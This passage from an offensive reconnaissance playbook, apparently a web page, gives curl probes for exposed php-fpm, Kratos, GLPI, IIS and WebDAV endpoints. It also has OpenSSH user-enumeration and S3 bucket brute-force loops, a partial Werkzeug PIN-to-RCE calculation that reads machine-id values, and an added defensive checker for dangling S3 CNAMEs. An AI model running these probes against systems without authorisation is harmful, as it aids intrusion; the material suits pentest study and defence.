&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -H &lt;span style="color:#a6d189"&gt;&amp;#34;User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;http://TARGET_IP:80/status&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Reveals in real time:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# - pool: www&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# - process manager: dynamic&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# - start time, accepted conn, listen queue&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# - active processes, idle processes, total processes&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# - PID, state, start time, requests, request URI, request method, SCRIPT FILENAME&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# → Script path: /var/www/ws/index.php (server&amp;#39;s internal path!)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="2513-ory-kratos-admin-api-detection" &gt;
&lt;div&gt;
&lt;a href="#2513-ory-kratos-admin-api-detection"&gt;
##
&lt;/a&gt;
25.13 Ory Kratos Admin API Detection
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Kratos Admin API returns 401 (exists!), not 404 (blocked)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sI &lt;span style="color:#a6d189"&gt;&amp;#34;https://openid.TARGET.com/k/admin/identities&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# HTTP 401 → endpoint EXISTS, only needs the API key&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sI &lt;span style="color:#a6d189"&gt;&amp;#34;https://openid.TARGET.com/k/admin/config&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# HTTP 401 → Kratos configuration exposed if you have the key&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Public endpoints (no auth):&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://openid.TARGET.com/k/public/schemas&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# JSON with identity schema: fields, validation, additionalProperties&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://openid.TARGET.com/self-service/login/browser&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 303 redirect → login flow (no rate limit?)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="2514-werkzeug-debugger--pin-bypass-calculation" &gt;
&lt;div&gt;
&lt;a href="#2514-werkzeug-debugger--pin-bypass-calculation"&gt;
##
&lt;/a&gt;
25.14 Werkzeug Debugger — PIN Bypass Calculation
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# If SECRET is exposed (e.g., 5BcAmPHc89fmWT3Tdflg) and EVALEX=true&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# OR if you can calculate the PIN from server information:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# The Werkzeug PIN is calculated with:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 1. username running Flask (probably root or www-data)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 2. /etc/machine-id or /proc/sys/kernel/random/boot_id&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 3. MAC address of the network interface&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 4. /proc/self/cgroup (first line)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# If any of these values leak via stack trace, LFI, or info disclosure:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# → Calculate PIN → interactive Python console → RCE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Calculation example (Werkzeug &amp;lt; 3.x):&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#81c8be"&gt;import&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;hashlib&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#81c8be"&gt;from&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;itertools&lt;/span&gt; &lt;span style="color:#81c8be"&gt;import&lt;/span&gt; chain
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;def&lt;/span&gt; &lt;span style="color:#8caaee"&gt;get_pin&lt;/span&gt;(machine_id, boot_id, mac_address, username&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;root&amp;#34;&lt;/span&gt;):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; probably_public_bits &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; [
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; username,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#39;flask.app&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#39;Flask&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#39;/usr/local/lib/python3.x/dist-packages/flask/app.py&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; private_bits &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; [machine_id, boot_id &lt;span style="color:#99d1db;font-weight:bold"&gt;+&lt;/span&gt; mac_address]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; h &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; hashlib&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;sha1()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# ... (implementation depends on the Werkzeug version)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="2515-glpi-statusphp--internal-paths" &gt;
&lt;div&gt;
&lt;a href="#2515-glpi-statusphp--internal-paths"&gt;
##
&lt;/a&gt;
25.15 GLPI status.php — Internal Paths
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl &lt;span style="color:#a6d189"&gt;&amp;#34;http://TARGET/status.php&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# GLPI status page reveals:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# - DB status (OK or PROBLEM)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# - AD connection status (AD1, AD2, AD3)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# - Installation path: C:\xampp\htdocs\glpi (Windows!)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# - GLPI version&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# - enabled/disabled APIs&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="2516-iis-traceaxd--aspnet-confirmation" &gt;
&lt;div&gt;
&lt;a href="#2516-iis-traceaxd--aspnet-confirmation"&gt;
##
&lt;/a&gt;
25.16 IIS Trace.axd — ASP.NET Confirmation
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sI &lt;span style="color:#a6d189"&gt;&amp;#34;http://TARGET/trace.axd&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# HTTP 200 with &amp;#34;Trace Error&amp;#34; → ASP.NET trace is enabled&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# (even with localOnly=true, it confirms ASP.NET + IIS)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sI &lt;span style="color:#a6d189"&gt;&amp;#34;http://TARGET/elmah.axd&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# If 200 → public Elmah error log (full error dump!)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# WebDAV test&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -X PROPFIND &lt;span style="color:#a6d189"&gt;&amp;#34;http://TARGET/&amp;#34;&lt;/span&gt; -H &lt;span style="color:#a6d189"&gt;&amp;#34;Depth: 1&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# If 207 → WebDAV enabled (possible upload/ls via PUT/PROPFIND)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="2517-openssh-user-enumeration-cve-2018-15473" &gt;
&lt;div&gt;
&lt;a href="#2517-openssh-user-enumeration-cve-2018-15473"&gt;
##
&lt;/a&gt;
25.17 OpenSSH User Enumeration (CVE-2018-15473)
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Affects OpenSSH &amp;lt; 7.7 (Ubuntu 18.04 default)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Valid vs invalid username has different timing&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Simplified manual test:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; user in root admin ubuntu deploy www-data git; &lt;span style="color:#ca9ee6"&gt;do&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db"&gt;time&lt;/span&gt; ssh -o &lt;span style="color:#f2d5cf"&gt;StrictHostKeyChecking&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;no -o &lt;span style="color:#f2d5cf"&gt;UserKnownHostsFile&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;/dev/null &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -o &lt;span style="color:#f2d5cf"&gt;BatchMode&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;yes &lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$user&lt;/span&gt;&lt;span style="color:#a6d189"&gt;@&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$TARGET&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt; 2&amp;gt;&amp;amp;&lt;span style="color:#ef9f76"&gt;1&lt;/span&gt; | head -1
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;done&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Timing/error difference → confirms user existence&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="2518-robotstxt--sensitive-paths-revealed" &gt;
&lt;div&gt;
&lt;a href="#2518-robotstxt--sensitive-paths-revealed"&gt;
##
&lt;/a&gt;
25.18 robots.txt — Sensitive Paths Revealed
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/robots.txt&amp;#34;&lt;/span&gt; | grep -i &lt;span style="color:#a6d189"&gt;&amp;#34;disallow&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Frequently reveals internal paths that should NOT be indexed:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Disallow: /admin&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Disallow: /internal&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Disallow: /config&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Disallow: /api/internal&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Disallow: /*/setcreditlimit ← sensitive endpoint&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Disallow: /*/card*&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Each blocked path is a potential target&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="2519-s3-bucket-detection--three-methods" &gt;
&lt;div&gt;
&lt;a href="#2519-s3-bucket-detection--three-methods"&gt;
##
&lt;/a&gt;
25.19 S3 Bucket Detection — Three Methods
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Method 1: Direct S3 URL&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sI &lt;span style="color:#a6d189"&gt;&amp;#34;https://{BUCKET}.s3.{REGION}.amazonaws.com/&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 200+XML = listable | 403 = exists/blocked | 404 = doesn&amp;#39;t exist&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Method 2: Domain CNAME to S3&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# If subdomain CNAME → s3.amazonaws.com and returns NoSuchBucket&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# → Subdomain takeover potential (create bucket with same name)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Method 3: Brute force naming patterns&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; name in &lt;span style="color:#a6d189"&gt;&amp;#34;target-prod&amp;#34;&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;target-dev&amp;#34;&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;target-static&amp;#34;&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;target-uploads&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;download.target.com&amp;#34;&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;static.target.com&amp;#34;&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;media.target.com&amp;#34;&lt;/span&gt;; &lt;span style="color:#ca9ee6"&gt;do&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#f2d5cf"&gt;status&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#ca9ee6"&gt;$(&lt;/span&gt;curl -sk -o /dev/null -w &lt;span style="color:#a6d189"&gt;&amp;#34;%{http_code}&amp;#34;&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;https://&lt;/span&gt;&lt;span style="color:#a6d189"&gt;${&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;name&lt;/span&gt;&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;.s3.amazonaws.com/&amp;#34;&lt;/span&gt;&lt;span style="color:#ca9ee6"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;[&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$status&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt; !&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;404&amp;#34;&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;]&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span style="color:#99d1db"&gt;echo&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$name&lt;/span&gt;&lt;span style="color:#a6d189"&gt; → &lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$status&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;done&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="2520-wildcard-dns-detection--hidden-service-discovery" &gt;
&lt;div&gt;
&lt;a href="#2520-wildcard-dns-detection--hidden-service-discovery"&gt;
##
&lt;/a&gt;
25.20 Wildcard DNS Detection + Hidden Service Discovery
&lt;/div&gt;
&lt;/h3&gt;
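&lt;p&gt;Defender-side counterpart to the bucket and wildcard checks in 25.19 and this section: an added example (editor's code, not part of the playbook) that audits a zone for CNAMEs pointing at S3 buckets nobody owns and tells you whether a wildcard record will make every brute-forced hostname look alive. The zone, the bucket list and the &lt;code&gt;bucket_exists&lt;/code&gt; callback are constructed stand-ins; against real DNS and AWS you would feed it your zone export and a HEAD request per bucket.&lt;/p&gt;

```python
import secrets

# Constructed zone (not real DNS): hostname -> list of (record type, value).
SAMPLE_ZONE = {
    "www.example.test": [("A", "192.0.2.10")],
    "static.example.test": [("CNAME", "static-example.s3.amazonaws.com.")],
    "media.example.test": [("CNAME", "media-example-old.s3.amazonaws.com.")],
    "painel.example.test": [("A", "192.0.2.20")],
    "*.example.test": [("A", "192.0.2.30")],
}
# Constructed stand-in for "does this bucket exist?". Against real AWS this is a
# HEAD on the bucket URL (200 or 403 = exists, 404 = free to register).
EXISTING_BUCKETS = {"static-example"}


def s3_bucket_from_target(target: str):
    """Bucket name if a CNAME target is a virtual-hosted S3 endpoint, else None."""
    labels = target.rstrip(".").lower().split(".")
    if len(labels) >= 4 and labels[-2:] == ["amazonaws", "com"] and labels[1].startswith("s3"):
        return labels[0]
    return None


def resolve(zone: dict, name: str) -> list:
    """Minimal resolver over the constructed zone, honouring a wildcard record."""
    if name in zone:
        return zone[name]
    parts = name.split(".", 1)
    if len(parts) == 2 and "*." + parts[1] in zone:
        return zone["*." + parts[1]]
    return []


def is_wildcard(zone: dict, domain: str) -> bool:
    """Same idea as 'dig random-label.domain': if a random label resolves, every
    guessed hostname resolves too and results need content-based filtering."""
    label = secrets.token_hex(6)
    return bool(resolve(zone, "%s.%s" % (label, domain)))


def find_dangling_s3(zone: dict, bucket_exists) -> list:
    """CNAMEs that point at an S3 bucket nobody owns: fix them (delete the record
    or recreate the bucket) before someone else registers that name."""
    dangling = []
    for name, records in zone.items():
        for rtype, value in records:
            if rtype != "CNAME":
                continue
            bucket = s3_bucket_from_target(value)
            if bucket and not bucket_exists(bucket):
                dangling.append((name, bucket))
    return dangling


if __name__ == "__main__":
    print("wildcard:", is_wildcard(SAMPLE_ZONE, "example.test"))
    print("dangling:", find_dangling_s3(SAMPLE_ZONE, lambda b: b in EXISTING_BUCKETS))
```

Run it as a scheduled job over your own zones: a dangling CNAME is a takeover waiting to happen, and knowing a zone is wildcard tells you to filter subdomain brute-force output by response content rather than by resolution.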
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Check if DNS is wildcard&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;dig +short &lt;span style="color:#a6d189"&gt;&amp;#34;random123xyz.TARGET.com&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# If it resolves → wildcard DNS (any subdomain resolves)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
